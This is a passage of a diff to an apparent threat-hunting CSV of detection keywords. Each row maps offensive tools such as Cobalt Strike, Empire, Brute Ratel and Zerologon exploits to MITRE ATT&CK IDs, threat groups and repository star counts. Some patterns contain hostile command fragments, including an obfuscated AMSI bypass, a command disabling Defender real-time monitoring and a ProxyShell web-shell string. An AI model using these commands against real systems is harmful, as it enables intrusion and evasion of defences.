- T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1329","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" +"*set userwx*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1329","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" "*set zombie *","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*set_child werfault.exe*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*set_command_exec exec_via_cmd*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" @@ -16407,7 +16590,7 @@ "*set_command_exec no_command*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" "*set_command_source download_bitsadmin*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" "*set_decoder xor*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" -"*set_empty_pw.py*","offensive_tool_keyword","POC","Zerologon CVE exploitation","T1210 - T1068","TA0001","N/A","N/A","Exploitation tools","https://github.com/risksense/zerologon","1","1","N/A","N/A","6","555","144","2020-10-15T18:31:15Z","2020-09-14T19:19:07Z" +"*set_empty_pw.py*","offensive_tool_keyword","POC","Zerologon CVE exploitation","T1210 - T1068","TA0001","N/A","N/A","Exploitation tools","https://github.com/risksense/zerologon","1","1","N/A","N/A","6","556","144","2020-10-15T18:31:15Z","2020-09-14T19:19:07Z" "*set_injection_technique*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" "*set_logon_script.py*","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","0","N/A","N/A","2","108","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" "*set_objectpipe \\*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" @@ -16422,53 +16605,53 @@ "*set_wmiconfig \*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*setc_webshell*","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FunnyWolf/pystinger","1","1","N/A","10","10","1283","212","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z" "*Set-DCShadowPermissions*","offensive_tool_keyword","AD exploitation cheat sheet","DCShadow is an attack that masks certain actions by temporarily imitating a Domain Controller. If you have Domain Admin or Enterprise Admin privileges in a root domain it can be used for forest-level persistence.","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*Set-DCShadowPermissions*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*Set-DesktopACLToAllow*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Set-DCShadowPermissions*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Set-DesktopACLToAllow*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Set-DomainObject*","offensive_tool_keyword","AD exploitation cheat sheet","Targeted kerberoasting by setting SPN","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*Seth by SySS GmbH*","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","0","N/A","9","10","1296","343","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z" -"*seth.py * -j INJECT*","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","0","N/A","9","10","1296","343","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z" -"*Seth-master.zip*","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","1","N/A","9","10","1296","343","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z" +"*Seth by SySS GmbH*","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","0","N/A","9","10","1299","343","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z" +"*seth.py * -j INJECT*","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","0","N/A","9","10","1299","343","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z" +"*Seth-master.zip*","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","1","N/A","9","10","1299","343","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z" "*sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx'*","offensive_tool_keyword","AD exploitation cheat sheet","PowerShell AMSI Bypass Obfuscation example for copy-paste purposes","T1548 T1562 T1027","N/A","N/A","N/A","Defense Evasion","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*set-killdate *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Set-Killdate*","offensive_tool_keyword","empire","empire function name of agent.ps1. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1049","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*setLoaderFlagZero*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1068","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" -"*Set-MacAttribute.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1088","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*set-killdate *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Set-Killdate*","offensive_tool_keyword","empire","empire function name of agent.ps1. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1049","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*setLoaderFlagZero*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*Set-MacAttribute.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1088","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Set-MpPreference -DisableRealtimeMonitoring *true*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Set-OabVirtualDirectory -ExternalUrl 'http*://*function Page_Load(){*}*","offensive_tool_keyword","ProxyShell","Microsoft Exchange Servers exploits - ProxyLogon and ProxyShell CVE-2021-27065 CVE-2021-34473 CVE-2021-34523 CVE-2021-31207","T1210.003 - T1190 - T1059.003 - T1059.001 - T1059.005 - T1505","TA0001 - TA0002 - TA0003 - TA0006 - TA0011","N/A","N/A","Exploitation Tools","https://www.cert.ssi.gouv.fr/uploads/ANSSI_TLPWHITE_ProxyShell_ProxyLogon_Sigma_yml.txt","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*setoolkit *","offensive_tool_keyword","social-engineer-toolkit","The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec","T1566 - T1598","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/trustedsec/social-engineer-toolkit","1","0","N/A","N/A","10","9394","2569","2023-08-25T17:25:45Z","2012-12-31T22:01:33Z" -"*SetProcessInjection*encryptor.py*","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 